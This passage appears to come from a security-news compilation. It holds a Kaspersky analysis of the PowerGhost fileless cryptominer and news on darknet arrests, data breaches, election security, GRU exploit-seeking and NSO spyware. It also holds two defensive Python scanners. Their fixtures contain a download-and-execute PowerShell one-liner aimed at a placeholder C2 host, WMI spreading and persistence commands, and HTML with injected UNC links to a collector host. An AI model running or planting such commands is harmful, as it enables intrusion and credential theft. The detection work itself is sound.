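# UNC paths (\\host\share\...) and file: URLs. Scheme-relative //host/ URLs are
# ordinary HTTP(S) references and are deliberately NOT matched.
SMB_REF = re.compile(r"^(?:\\\\[^\\]+\\|file:)", re.I)
UNC_HOST = re.compile(r"^\\\\([^\\]+)\\")
FILE_HOST = re.compile(r"^file:(?://)?([^/\\]+)[/\\]", re.I)


class SmbRefScanner(HTMLParser):
    """Collect (tag, attribute, value) for every SMB-resolvable reference."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and name.lower() in FETCH_ATTRS and SMB_REF.match(value.strip()):
                self.findings.append((tag, name.lower(), value.strip()))


def scan_html(html: str):
    parser = SmbRefScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


def remote_hosts(findings):
    """Hosts the references would make the browser contact over SMB; a local
    file:///C:/... path has no host and is skipped."""
    hosts = set()
    for _tag, _attr, value in findings:
        m = UNC_HOST.match(value) or FILE_HOST.match(value)
        if m:
            hosts.add(m.group(1).lower())
    return hosts


def auto_fetched(findings):
    """Only references fetched without user interaction (everything except an
    <a href>), which is what makes the technique work on a plain page visit."""
    return [f for f in findings if not (f[0] == "a" and f[1] == "href")]


# Constructed sample: a normal page with one injected <link>, one injected
# <img> and one injected <a>; the collector host name is a placeholder.
SAMPLE_PAGE = r"""<html><head>
<link rel="stylesheet" href="//cdn.example/site.css">
<link rel="stylesheet" href="file://collector.example.invalid/share/s.css">
</head><body>
<img src="https://cdn.example/logo.png">
<img src="\\collector.example.invalid\share\pixel.png" width="1" height="1">
<a href="\\collector.example.invalid\docs\report.docx">report</a>
</body></html>"""

if __name__ == "__main__":
    found = scan_html(SAMPLE_PAGE)
    for tag, attr, value in found:
        print(tag, attr, value)
    print("hosts to block/sinkhole:", remote_hosts(found))
```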

A mining multitool
2.8.2018 Kaspersky  Cryptocurrency

Symbiosis of PowerShell and EternalBlue for cryptocurrency mining
Recently, an interesting miner implementation appeared on Kaspersky Lab’s radar. The malware, which we dubbed PowerGhost, is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers. This type of hidden consolidation is typical of miners: the more machines that get infected and the longer they remain that way, the greater the attacker’s profits. Therefore, it’s not uncommon to see clean software being infected with a miner; the popularity of the legitimate software serves to promote the malware’s proliferation. The creators of PowerGhost, however, went further and started using fileless techniques to establish the illegal miner within the victim system. It appears the growing popularity and rates of cryptocurrencies have convinced the bad guys of the need to invest in new mining techniques – as our data demonstrates, miners are gradually replacing ransomware Trojans.

Technical description and propagation method
PowerGhost is an obfuscated PowerShell script that contains the core code and the following add-on modules: the actual miner, mimikatz, the libraries msvcp120.dll and msvcr120.dll required for the miner’s operation, a module for reflective PE injection and a shellcode for the EternalBlue exploit.

Fragment of the obfuscated script

The add-on modules encoded in base64

The malicious program uses lots of fileless techniques to remain inconspicuous to the user and undetected by antivirus technologies. The victim machine is infected remotely using exploits or remote administration tools (Windows Management Instrumentation). During infection, a one-line PowerShell script is run that downloads the miner’s body and immediately launches it without writing it to the hard drive.

What the script does after that can be broken down into several stages:

Automatic self-update. PowerGhost checks if a new version is available on the C&C. If there is, it downloads the new version and launches it instead of itself.

Propagation. With the help of mimikatz, the miner obtains the user account credentials from the current machine, uses them to log on and attempts to propagate across the local network by launching a copy of itself via WMI. By “a copy of itself” here and below we mean the one-line script that downloads the miner’s body from the C&C.
PowerGhost also tries to spread across the local network using the now-notorious EternalBlue exploit (MS17-010, CVE-2017-0144).
Escalation of privileges. As the miner spreads via mimikatz and WMI, it may end up on a new machine with user rights. It will then attempt to escalate its privileges in the system with the 32- or 64-bit exploits for MS16-032, MS15-051 and CVE-2018-8120.
Establishing a foothold in the system. PowerGhost saves all the modules as properties of a WMI class. The miner’s body is saved in the form of a one-line PowerShell script in a WMI subscription that activates every 90 minutes.

Payload. Lastly, the script launches the miner by loading a PE file via reflective PE injection.
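
The stages above leave traces in process-creation logs even though nothing is written to disk. The script below is an added example (not Kaspersky's code) that decodes -EncodedCommand payloads and flags the three PowerGhost-style patterns: a fileless download-and-execute one-liner, a WMI-launched copy, and a WMI event subscription used for persistence. The log lines are constructed in a simple pipe-separated form, and the URL and host names in them are placeholders.

```python
"""Hunt process-creation logs for PowerGhost-style PowerShell activity.

Added example, not Kaspersky's code. Log lines are constructed as
time|host|user|command line; URL and host names are placeholders.
"""
import base64
import re

# -EncodedCommand and its accepted abbreviations, followed by a base64 blob.
ENCODED_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Each indicator is a list of patterns that must ALL appear in the decoded command.
INDICATORS = {
    # one-liner that fetches the body and runs it in memory
    "fileless_download_exec": [
        re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
        re.compile(r"\b(?:DownloadString|DownloadData|Net\.WebClient)\b", re.I),
    ],
    # a copy launched on another machine through WMI
    "wmi_remote_launch": [
        re.compile(r"\bWin32_Process\b", re.I),
        re.compile(r"\b(?:Invoke-WmiMethod|Invoke-CimMethod)\b", re.I),
    ],
    # persistence through a WMI event subscription
    "wmi_event_persistence": [
        re.compile(r"\b(?:__EventFilter|CommandLineEventConsumer|"
                   r"__FilterToConsumerBinding|Register-WmiEvent)\b", re.I),
    ],
}


def decode_encoded_command(cmdline: str) -> str:
    """Return the command line with any -EncodedCommand payload decoded
    (PowerShell encodes it as base64 of UTF-16LE text). Unchanged when the
    argument is absent or the blob is not valid base64."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return cmdline[: m.start(1)] + decoded + cmdline[m.end(1):]


def classify(cmdline: str):
    """Return the names of the indicators matched by a (decoded) command line."""
    text = decode_encoded_command(cmdline)
    return sorted(name for name, pats in INDICATORS.items()
                  if all(p.search(text) for p in pats))


def scan_log(lines):
    """Parse constructed 'time|host|user|cmdline' lines and return (host,
    indicators) for every PowerShell command matching at least one indicator."""
    hits = []
    for line in lines:
        parts = line.split("|", 3)
        if len(parts) != 4:
            continue
        _, host, _, cmdline = parts
        if "powershell" not in cmdline.lower():
            continue
        found = classify(cmdline)
        if found:
            hits.append((host, found))
    return hits


def _encode(ps: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it;
    used only to construct the sample log below."""
    return base64.b64encode(ps.encode("utf-16le")).decode("ascii")


# Constructed sample log; c2.example.invalid and the WS-* hosts are placeholders.
SAMPLE_LOG = [
    "2018-07-20T10:01:02|WS-01|corp\\alice|powershell.exe -NoP -W Hidden -enc "
    + _encode("IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/p.ps1')"),
    "2018-07-20T10:03:15|WS-01|corp\\alice|powershell.exe -Command \"Invoke-WmiMethod "
    "-Class Win32_Process -Name Create -ComputerName WS-02 -ArgumentList 'powershell -enc ...'\"",
    "2018-07-20T10:04:40|WS-02|NT AUTHORITY\\SYSTEM|powershell.exe -Command \"Set-WmiInstance "
    "-Namespace root\\subscription -Class __EventFilter -Arguments @{Name='upd'}\"",
    "2018-07-20T10:05:00|WS-03|corp\\bob|powershell.exe -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for host, found in scan_log(SAMPLE_LOG):
        print(host, ", ".join(found))
```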
In one PowerGhost version, we detected a tool for conducting DDoS attacks. The malware writers obviously decided to make some extra money by offering DDoS services.

PowerShell function with the tell-tale name RunDDOS

It’s worth pointing out that this is the only one of the miner’s functions that copies files to the hard drive. This is quite possibly a test tool that will later be replaced with a fileless implementation. Also supporting the assertion that this function was added to this version as an afterthought is the peculiar way the DDoS module is launched: the script downloads two PE modules, logos.png and cohernece.txt. The former is saved to the hard drive as java-log-9527.log and is an executable file for conducting DDoS attacks. The file cohernece.txt is protected with the software protection tool Themida, complete with a check for execution in a virtual environment. If the check does not detect a sandbox, then cohernece.txt launches the file java-log-9527.log for execution. In this curious way, the ready DDoS module was supplemented with a function to check for execution in a virtual environment.

Fragment of disassembled code of the file cohernece.txt

Statistics and geography
Corporate users bore the brunt of the attack: it’s easier for PowerGhost to spread within a company’s local area network.

Geography of infections by the miner

PowerGhost is encountered most often in India, Brazil, Colombia and Turkey.

Kaspersky Lab’s products detect the miner and/or its components with the following verdicts:

E-wallets at nanopool.org and minexmr.com:


Indicators of compromise
C&C hostnames:

Darknet Market Spokesman Gets Nearly 4 Years in Prison
2.8.2018 securityweek Crime

ATLANTA (AP) — A man who promoted an international criminal online marketplace and assisted people using it for illicit transactions was sentenced Tuesday in Atlanta to serve nearly four years in federal prison.

Ronald L. Wheeler III of Streamwood, Illinois, worked for about two years as a public relations specialist for AlphaBay, which authorities have said was the world's leading "darknet" marketplace when an international law enforcement effort shut it down in July 2017.

Wheeler pleaded guilty in March to a charge of conspiracy to commit access device fraud. Prosecutors said he worked with others to steal personal information — including passwords, email addresses and bank account numbers — to obtain money, goods and services.

U.S. District Judge Leigh May sentenced Wheeler, 25, to spend three years and 10 months in prison, followed by three years of supervised release. As part of a plea deal reached with prosecutors, Wheeler also agreed to forfeit $27,562 in cash found in his home and 13.97 bitcoins, which are currently worth a total of more than $100,000.

Wheeler apologized to the judge and told her he has worked hard since he was caught to get himself on the right path — getting a legitimate job, paying taxes and kicking a drug addiction.

"As I move forward, I hope to be able to do right by this country and the world," he said.

May said Wheeler's crime was extremely serious, but she imposed the relatively light sentence agreed to by the two sides in part because of the effort he'd made.

"You're doing what you need to do to show me you've learned from this," she said.

Known online as Trappy and Trappy_Pandora, Wheeler began working for AlphaBay in May 2015. His duties included moderating the AlphaBay forum on Reddit and posting information about AlphaBay in other Reddit forums, mediating sales disputes among the marketplace's users, providing nontechnical assistance to users and promoting AlphaBay online, prosecutors have said.

Wheeler's lawyer, Phillip Turner, described his client as a "very misguided young man who came from a situation where he lacked self-esteem and got on the wrong path." Having a title bestowed upon him by AlphaBay made him feel important and gave him a sense of belonging, Turner said in court.

Prosecutor Samir Kaushal told the judge Wheeler was completely aware he was involved in illegal activity and encouraged lawlessness in others. Given the scope of the illegal activity enabled by AlphaBay — including the sale of personal financial information and dangerous drugs — Wheeler could have been charged with much more serious crimes that would have carried a much heftier sentence.

"This is a very good outcome for him," Kaushal said.

The only reason prosecutors recommended a lower sentence is because when he was caught, he immediately admitted his guilt and began cooperating with the government, Kaushal said.

Wheeler was paid a salary in bitcoin, a digital currency, by Alexandre Cazes, the 25-year-old Canadian owner of AlphaBay who was known online as Alpha02 and Admin, according to a court filing.

AlphaBay used Tor, a network of thousands of computers run by volunteers, to hide its tracks. With Tor, traffic gets relayed through multiple computers, with identifying information stripped at each stop so no single computer knows the full chain.

The court filing says Wheeler's work with AlphaBay ended July 3, 2017. Two days later, Cazes was arrested in Thailand with DEA and FBI assistance, resulting in AlphaBay going offline. Cazes died in Thai police custody on July 12, 2017. The country's narcotics police chief told reporters at the time that Cazes hanged himself in jail just before a scheduled court hearing.

The police agency Europol estimates AlphaBay had done $1 billion in business since its 2014 creation. Cazes had amassed a $23 million fortune as the site's creator and administrator, according to court records.

Dixons Carphone Breach: Much Larger Than First Thought
2.8.2018 securityweek Incident

A data breach at Dixons Carphone that was made public last month resulted in 10 million records being accessed by unknown actors, the UK consumer electronics retailer announced Tuesday.

The company initially said that only 1.2 million records containing personal data of its customers, such as name, address or email address, were accessed during the intrusion. They also claimed that the accessed data did not include financial information.

In an update released this week (PDF), the company revealed that hackers were able to access approximately 10 million records containing personal data. The incident happened last year, but no specific details on when or how the intrusion took place were provided.

Although it initially said that the attackers were attempting to access 5.9 million cards and that 105,000 non-EU issued payment cards were indeed compromised, the company now says that the impacted records did not contain payment card details.

“While there is now evidence that some of this data may have left our systems, these records do not contain payment card or bank account details and there is no evidence that any fraud has resulted. We are continuing to keep the relevant authorities updated,” Dixons Carphone said.

The company also announced that it has decided to inform all of its customers of the data breach. The retailer says this is only a precaution; it is apologizing to customers while advising them of protective steps they can take to minimize the risk of fraud.

“As we indicated previously, we have taken action to close off this access and have no evidence it is continuing,” the company said.

Yale University Discloses Decade-Old Data Breach
2.8.2018 securityweek Incident

"Because the intrusion happened nearly ten years ago, we do not have much more information about how it occurred."

Yale University revealed that hackers accessed one of its databases between 2008 and 2009 and obtained the personal information of 119,000 people.

The intrusion happened between April 2008 and January 2009 and apparently affected a single database stored on a Yale server. The data breach was discovered on June 16, 2018, during a security review. The attackers extracted names, Social Security numbers, and, in almost all cases, dates of birth. In many cases, Yale email addresses were also extracted, and in some cases the physical addresses of individuals associated with the university were compromised as well.

According to Yale, no financial information was stored in the database and almost all people impacted by the breach were affiliated with the university.

“In 2011, Yale IT deleted the personal information in the database as part of an effort to eliminate unneeded personal information on Yale servers, but the intrusion was not detected at that time,” the university says.

Last week, Yale sent notices of the data breach to impacted members of the Yale community, including alumni/ae, faculty members, and staff members. The university says notices were sent to nearly 97% of the individuals affected, but that it has yet to acquire a verified current address for the remaining 3%.

In a letter (PDF) to the State of New Hampshire Attorney General, Yale also revealed that the same server was hacked a second time between March 2016 and June 2018. The intrusion resulted in the compromise of the names and Social Security numbers of 33 individuals, none of whom reside in New Hampshire.

Yale claims that there is no indication that the compromised information has been misused. However, it decided to offer identity monitoring services at no cost, to help users guard against identity theft.

Because the intrusion occurred a decade ago, there is no information on how the attackers hacked the server. Yale also says that “it is not feasible to determine the identities of the perpetrators.”

Trump Criticized for Not Leading Effort to Secure Elections
2.8.2018 securityweek BigBrothers

WASHINGTON (AP) — As alarms blare about Russian interference in U.S. elections, the Trump administration is facing criticism that it has no clear national strategy to protect the country during the upcoming midterms and beyond.

Both Republicans and Democrats have criticized the administration's response as fragmented, without enough coordination across federal agencies. And with the midterms just three months away, critics are calling on President Donald Trump to take a stronger stand on an issue critical to American democracy.

"There's clearly not enough leadership from the top. This is a moment to move," said Maryland Sen. Chris Van Hollen, head of the Democratic Senatorial Campaign Committee. "I don't think they are doing nearly enough."

Various government agencies have been at work to ensure safe voting. The FBI has set up a Foreign Influence Task Force and intelligence agencies are collecting information on Russian aggression.

But Trump himself rarely talks about the issue. And in the nearly two years since Russians were found to have hacked into U.S. election systems and manipulated social media to influence public opinion, the White House has held two meetings on election security.

One was last week. It ran 30 minutes.

The meeting resulted in no new presidential directive to coordinate the federal effort to secure the election, said Suzanne Spaulding, former undersecretary of homeland security who was responsible for cyber security and protecting critical infrastructure.

"Trump's failure to take a leadership role on this, up until this (National Security Council) meeting, misses an opportunity to send a clear message to states that this is a very serious threat," Spaulding said. "We did not get out of this NSC meeting a comprehensive, interagency strategy. It was each department and agency working in their silos."

Garrett Marquis, a spokesman for the NSC, said the government response is robust. He said NSC staff "leads the regular and continuous coordination of the whole-of-government approach to addressing foreign malign influence and ensuring election security."

At a cybersecurity summit on Tuesday, Vice President Mike Pence said he was confident officials could prevent further meddling by foreign agents.

"We will repel any efforts to interfere in our elections," he said.

Republican Sen. Lindsey Graham of South Carolina said government agencies are "doing a lot of good work, but nobody knows about it." He lamented Trump's contradictory statements about whether he accepts the U.S. intelligence assessment that Russia meddled in the 2016 presidential election.

"What I think he needs to do is lead this nation to make sure the 2018 election is protected," Graham said recently on CBS' "Face the Nation." "He needs to be the leader of the movement — not brought to the dance reluctantly. So, I hope he will direct his government, working with Congress, to harden the 2018 election before it's too late."

The debate over safeguarding U.S. elections comes as evidence of cyber threats piles up. Facebook announced Tuesday that it has uncovered "sophisticated" efforts, possibly linked to Russia, to influence U.S. politics on its platforms.

The company said it removed 32 accounts from Facebook and Instagram because they were involved in "coordinated" political behavior and appeared to be fake. Nearly 300,000 people followed at least one of the accounts.

Earlier this month, Microsoft said it discovered that a fake domain had been set up as the landing page for phishing attacks by a hacking group believed to have links to Russian intelligence. A Microsoft spokesman said Monday that additional analysis has confirmed that the attempted attacks occurred in late 2017 and targeted multiple accounts associated with the offices of two legislators running for re-election. Microsoft did not name the lawmakers.

Sen. Claire McCaskill, D-Mo., has said Russian hackers tried unsuccessfully to infiltrate her Senate computer network in 2017.

Sen. Jeanne Shaheen, D-N.H., who is not running for re-election, told The Associated Press on Monday that someone contacted her office "claiming to be an official from a country."

A frequent critic of Russia, Shaheen said she didn't know if Moscow was behind the email received in November but had turned the matter over to the FBI.

Shaheen said another senator had been targeted besides McCaskill. "It's my understanding that there is, but I don't want to speak for other senators," she said. When asked if it was a Democratic senator, Shaheen nodded yes.

"People on both sides of the aisle have been beating the drum for two years now about the need for somebody to be accountable for cybersecurity across the government," Shaheen said.

National Intelligence Director Dan Coats said U.S. intelligence officials continue to see activity from individuals affiliated with the Internet Research Agency, whose members were indicted by U.S. special counsel Robert Mueller. Coats said they create new social media accounts disguised as those of Americans, then use the fake accounts to drive attention to divisive issues in America.

In the Obama administration, synchronizing federal agencies' work on election security would have likely been the job of the White House cybersecurity coordinator. Trump's national security adviser, John Bolton, abolished the post in May to remove a layer of bureaucracy from the NSC flow chart.

Under the current structure, the point man for election security is Rear Adm. Douglas Fears. Trump tapped Fears in early June as his deputy assistant to the president and homeland security and counterterrorism adviser.

Fears oversees the election security and other portfolios of the NSC's Cybersecurity Directorate and coordinates the federal government's response to disasters.

Homeland Security Secretary Kirstjen Nielsen says cyber threats are "an urgent, evolving crisis."

"Our adversaries' capabilities online are outpacing our stove-piped defenses," Nielsen said Tuesday. "In fact, I believe that cyber threats collectively now exceed the danger of physical attacks against us. This is a major sea change for my department and for our country's security."

FireEye MalwareGuard Uses Machine Learning to Detect Malware
2.8.2018 securityweek

FireEye on Tuesday announced the launch of MalwareGuard, an engine that leverages machine learning (ML) to detect malware and prevent it from executing.

MalwareGuard has been added to FireEye’s Endpoint Security product and the firm will also be deploying the new engine to its Network Security and Email Security solutions.

The engine is designed to predict whether a Windows executable file is malicious, prior to its execution. MalwareGuard should be able to detect both known malware and zero-day threats, FireEye said.

MalwareGuard is based on two years of research conducted by the company, which included assembling a dataset of more than 300 million samples and using it to train the engine. During its internal evaluation, which involved testing in real-world incident response cases, FireEye made predictions on over 20 million executable files.

“During the internal evaluation period, we also developed the infrastructure to support long-term tracking and maintenance for MalwareGuard,” FireEye said in a blog post. “Our goal was and is to have real-time visibility into the model’s performance, with the expectation that model retraining could be done on demand when performance dips below a threshold. To meet this objective, we developed data pipelines for each phase of the ML process, which makes the system fully automatable.”

The company’s blog post includes details on the goals, development, and testing of MalwareGuard.

In addition to MalwareGuard, FireEye informed customers that its Endpoint Security solution now includes new features designed to provide improved management capabilities and enable organizations to rapidly respond to important alerts.

MalwareGuard and the other new features have been added to the latest version of FireEye Endpoint Security, specifically version 4.5.

Leaked Chats Show Alleged Russian Spy Seeking Hacking Tools
2.8.2018 securityweek BigBrothers

MOSCOW (AP) — Six years ago, a Russian-speaking cybersecurity researcher received an unsolicited email from Kate S. Milton.

Milton claimed to work for the Moscow-based anti-virus firm Kaspersky. In an exchange that began in halting English and quickly switched to Russian, Milton said she was impressed by the researcher's work on exploits — the digital lock picks used by hackers to break into vulnerable systems — and wanted to be copied in on any new ones that the researcher came across.

"You almost always have all the top-end exploits," Milton said, after complimenting the researcher about a post to her website, where she often dissected malicious software.

"So that our contact isn't one-sided, I'd offer you my help analyzing malicious viruses, and as I get new samples I'll share," Milton continued. "What do you think?"

The researcher — who works as a security engineer and runs the malware-sharing site on the side — always had a pretty good idea that Milton wasn't who she said she was. Last month, she got confirmation via an FBI indictment.

The indictment, made public on July 13, lifted the lid on the Russian hacking operation that targeted the 2016 U.S. presidential election. It identified "Kate S. Milton" as an alias for military intelligence officer Ivan Yermakov, one of 12 Russian spies accused of breaking into the Democratic National Committee and publishing its emails in an attempt to influence the 2016 election.

The researcher, who gave her exchanges with Milton to The Associated Press on condition of anonymity, said she wasn't pleased to learn she had been corresponding with an alleged Russian spy. But she wasn't particularly surprised either.

"This area of research is a magnet for suspicious people," she said.

The researcher and Milton engaged in a handful of conversations between April 2011 and March 2012. But even their sparse exchanges, along with a few digital breadcrumbs left behind by Yermakov and his colleagues, offer insight into the men behind the keyboards at Russia's Main Intelligence Directorate, or GRU.

It isn't unusual for messages like Milton's to come in out of the blue, especially in the relatively small world of independent malware analysts.

"There was nothing particularly unusual in her approach," the researcher said. "I had very similar interactions with amateur and professional researchers from different countries."

The pair corresponded for a while. Milton shared a piece of malicious code at one point and sent over a hacking-related YouTube video at another, but contact fizzled out after a few months.

Then, the following year, Milton got back in touch.

"It's been all work, work, work," Milton said by way of apology, before quickly getting to the point. She needed new lock picks.

"I know that you can help," she wrote. "I'm working on a new project and I really need contacts that can provide information or have contacts with people who have new exploits. I am willing to pay for them."

In particular, Milton said she wanted information on a recently disclosed vulnerability identified as CVE-2012-0002, a critical flaw in Microsoft's Remote Desktop Protocol (patched as MS12-020) that could allow attackers to remotely compromise Windows computers. Milton had heard that someone had already cobbled together a working exploit.

"I'd like to get it," she said.

The researcher demurred. The trade in exploits — for use by spies, cops, surveillance companies or criminals — can be a seedy one.

"I usually steer clear from any wannabe buyers and sellers," she told the AP.

She politely declined - and never heard from Milton again.

Milton's Twitter account — whose profile photo features "Lost" star Evangeline Lilly — is long dormant. The last few messages carry urgent, awkwardly worded appeals for exploits or tips about vulnerabilities.

"Help me find detailed description CVE-2011-0978," one message reads, referring to a bug in PHP, a coding language often used for websites. "Need a work exploit," the message continues, ending with a smiley face.

It isn't clear whether Yermakov was working for the GRU when he first masqueraded as Kate S. Milton. Milton's Twitter silence — starting in 2011 — and the reference to a "new project" in 2012 might hint at a new job.

In any case, Yermakov wasn't working for the anti-virus firm Kaspersky — not then and not ever, the company said in a statement.

"We don't know why he allegedly presented himself as an employee," the statement said.

Messages sent by the AP to Kate S. Milton's Gmail account were not returned.

The exchanges between Milton (Yermakov) and the researcher could be read in different ways.

They might show that the GRU was trying to cultivate people in the information security community with an eye toward getting the latest exploits as soon as possible, said Cosimo Mortola, a threat intelligence analyst at the cybersecurity company FireEye.

It's also possible that Yermakov might have initially worked as an independent hacker, hustling for spy tools before being hired by Russian military intelligence — a theory that makes sense to defense and foreign policy analyst Pavel Felgenhauer.

"For cyber, you have to hire boys that understand computers and everything the old spies at the GRU don't understand," Felgenhauer said. "You find a good hacker, you recruit him and give him some training and a rank — a lieutenant or something — and then he will do the same stuff."

The leak of Milton's conversations shows how the glare of publicity is revealing elements of the hackers' methods — and perhaps even hints about their private lives.

It's possible, for example, that Yermakov and many of his colleagues commute to work through the arched entrance to Komsomolsky 22, a military base in the heart of Moscow that serves as home to the alleged hacker's Unit 26165. Photos shot from inside show it's a well-kept facility, with a czarist-era facade, manicured lawns, flower beds and shady trees in a central courtyard.

The AP and others have tried to trace the men's digital lives, finding references to some of those indicted by the FBI in academic papers on computing and mathematics, on Russian cybersecurity conference attendee lists or — in the case of Cpt. Nikolay Kozachek, nicknamed "kazak" — written into the malicious code created by Fancy Bear, the nickname long applied to the hacking squad before their identities were allegedly revealed by the FBI.

One of Kozachek's other nicknames also appears on a website that allowed users to mine tokens for new weapons to use in the first-person shooter videogame "Counter Strike: Global Offensive" — providing a flavor of the hackers' extracurricular interests.

The AP has also uncovered several social media profiles tied to another of Yermakov's indicted colleagues — Lt. Aleksey Lukashev, allegedly the man behind the successful phishing of the email account belonging to Hillary Clinton's campaign chairman, John Podesta.

Lukashev operated a Twitter account under the alias "Den Katenberg," according to an analysis of the indictment as well as data supplied by the cybersecurity firm Secureworks and Twitter's "Find My Friends" feature.

A tipster using the Russian facial recognition search engine FindFace recently pointed the AP to a VKontakte account that, while using a different name, appears active and features photos of the same young, Slavic-looking man.

Many of his posts and his friends appear to originate from a district outside Moscow known as Voskresensky. The photos show him cross-country skiing at night, wading in emerald waters somewhere warm and visiting Yaroslavl, an ancient city northwest of Moscow. One video appeared to show Russia's 2017 Spasskaya Tower Festival, a military music festival popular with officers.

The AP could not establish with certainty that the man on the VKontakte account is Lukashev. Several people listed as friends either declined to comment when approached by the AP or said Lukashev's name was unknown to them.

Shortly thereafter, the profile's owner locked down his account, making his vacation snaps invisible to outsiders.

The exchanges between the cybersecurity researcher and Kate S. Milton are available here.

The Disconnect Between Understanding Email Threats and Preventing Them
2.8.2018 securityweek

Email continues to be the starting point for the majority of all security breaches. The 2018 Verizon Data Breaches Investigation Report (DBIR) says that email is the attack vector in 96% of breaches. But a new study suggests that despite these figures, companies are not allocating sufficient resources to reduce email risk.

The study (PDF) was conducted by the Ponemon Institute for Valimail, an email security automation firm. Ponemon surveyed 650 IT and IT security professionals who have a role in securing email applications and/or protecting end-users from email threats. It found, according to Ponemon, a "disconnect between concerns about email threats and fraud and the lack of action taken by companies represented in this study."

Findings suggest that 80% of respondents are very concerned about their ability to counter the email threat, but only 29% are taking significant steps to counter the threat. The greatest concerns are that hackers might spoof their email domain "to hurt the deliverability of legitimate emails" (82%); the overall state of their current email security (80%); and that they could be hacked or infiltrated via a phishing email (69%).

The threat from email phishing, spoofing and impersonation attacks is understood and acknowledged. Seventy-four percent of respondents are concerned about phishing emails directed at employees or executives; 67% about email as a source of fraud against the company (such as BEC attacks); 66% about email as a vector for infiltrating malware and/or exfiltrating data; and 65% about hackers impersonating the company in phishing attacks against others -- that is, other firms and non-employees.

The disconnect comes from the company response to the concerns held by their own professionals. Only 29% of the respondents believe their firm is taking significant steps to prevent phishing attacks and email impersonation, while 21% say they are taking 'no steps' -- despite the DBIR's evidence that email is the source of almost all data breaches.

Only 41% of the respondents say their organization has created a security infrastructure or plan for email -- but of these, almost half say there is no schedule for reviewing its effectiveness (39%), or are unsure of any review schedule (10%). Only 11% of respondents said their organization reviews the effectiveness of its email security plan quarterly.

Part of the problem may be down to the traditional relationship between OT and IT. While email is firmly a part of information technology rather than operational technology, nevertheless it has an operational business function. As such, operational ease and continuity might be receiving a higher priority than security. This is possibly supported by managerial responsibility.

Asked, 'Who within the organization is primarily responsible for the security of email and services/applications that use email?', only 15% of the respondents said it was the CISO/CSO. Twenty-one percent said it was the CIO/CTO, 20% said the line of business management, 9% said the head of messaging services, and 9% said the head of IT Operations. Somewhat surprisingly, the majority of organizations do not have their head of security responsible for the security of emails.

Impersonation attacks are an acknowledged and growing email threat. The top five currently-used technologies to prevent these are anti-spam/phishing filters (63%), secure email gateways (53%), SIEMs (44%), DMARC (39%), and anti-phish training (30%). Use of all of these is expected to grow over the next 12 months: filters by 2%, SEGs by 10%, SIEMs by 3%, DMARC by 9%, and phish training by a colossal 27%.

These figures simply indicate that use of the existing technologies, which have so far failed to prevent email being the starting point of 96% of all security breaches, will be increased. This doesn't mean, however, that the respondents have abandoned hope in their ability to improve things. Asked what effect a 20% increase in their email security budget would have, the reply was a 45% improvement in the detection rate with a 33% improvement in the prevention rate.

"With the dramatic rise in impersonation attacks as a primary vector for cyberattacks, companies are re-assessing the balance of their security efforts,” said Alexander García-Tobar, CEO and co-founder of Valimail.

“While traditional approaches are good for filtering malicious content and blocking spam, impersonation attacks can only be stopped with email anti-impersonation solutions. Individuals at all levels of a company, including customers and clients, are vulnerable to phishing, fraud, and impersonation attacks. Companies can strengthen their security against email fraud with automated solutions and close that disconnect between email threats and preventive action," he added.

What surprises Ponemon, however, is the current lack of adoption of such automated solutions. "We were surprised to see a vast majority of companies who believe that they have had a breach involving email but are not yet embracing automated anti-impersonation solutions to protect themselves proactively,” said Dr. Larry Ponemon, chairman and founder of Ponemon Institute. “Adopting fully automated solutions for DMARC enforcement that provide email authentication will help companies get ahead of the attackers and build trust with their clients and end users."

Human Rights Group: Employee Targeted With Israeli Spyware
2.8.2018 securityweek

LONDON (AP) — An Amnesty International employee has been targeted with Israeli-made surveillance software, the human rights group said Wednesday, adding to a growing number of examples of Israeli technology being used to spy on human rights workers and opposition figures in the Middle East and beyond.

In a 20-page report, Amnesty outlined how it thinks a hacker tried to break into an unidentified staff member's smartphone in early June by baiting the employee with a WhatsApp message about a protest in front of the Saudi Embassy in Washington.

The London-based human rights organization said it traced the malicious link in the message to a network of sites tied to the NSO Group, an Israeli surveillance company implicated in a series of digital break-in attempts, including a campaign to compromise proponents of a soda tax in Mexico and an effort to hack into the phone of an Arab dissident that prompted an update to Apple's operating system.

Joshua Franco, Amnesty's head of technology and human rights, said the latest hacking attempt was emblematic of the increased digital risk faced by activists worldwide.

"This is the new normal for human rights defenders," Franco said.

NSO said in a written statement that its product was "intended to be used exclusively for the investigation and prevention of crime and terrorism" and that allegations of wrongdoing would be investigated. In response to a series of written questions, the company said past allegations of customer misuse had, in an undisclosed number of cases, led to the termination of contracts.

Amnesty's findings were corroborated by internet watchdog Citizen Lab, which has been tracking NSO spyware for two years and is based at the University of Toronto's Munk School of Global Affairs.

In its own report being released Wednesday, Citizen Lab said it so far had counted some 175 targets of NSO spyware worldwide, including 150 people in Panama identified as part of a massive domestic espionage scandal swirling around the country's former president.

The Amnesty International report said the organization identified a second human rights activist, in Saudi Arabia, who was targeted in a similar way to its staffer. Citizen Lab said it found traces of similar hacking attempts tied to Qatar or Saudi Arabia, hinting at the use of the Israeli spyware elsewhere in the Gulf.

Any possible use of Israeli technology to police dissent in the Arab world could raise uncomfortable questions both for Israel, which still sees itself as a bastion of democracy in the region, and for countries with no formal diplomatic ties to the Jewish state.

For Amnesty's Franco, it was a sign of an out-of-control trade in high-tech surveillance tools.

"This is a huge market that's completely opaque and under-regulated," he said.

Three Ukrainians Arrested for Hacking Over 100 US Companies
2.8.2018 securityweek Crime

Three Ukrainians have been arrested for hacking more than 100 US companies and stealing millions of customer records, the Department of Justice announced Wednesday.

Dmytro Fedorov, 44, Fedir Hladyr, 33, and Andrii Kolpakov, 30, were members of a "sophisticated international cybercrime group" called "FIN7," the department said in a statement.

"Since at least 2015, FIN7 members engaged in a highly sophisticated malware campaign targeting more than 100 US companies, predominantly in the restaurant, gaming, and hospitality industries," it said.

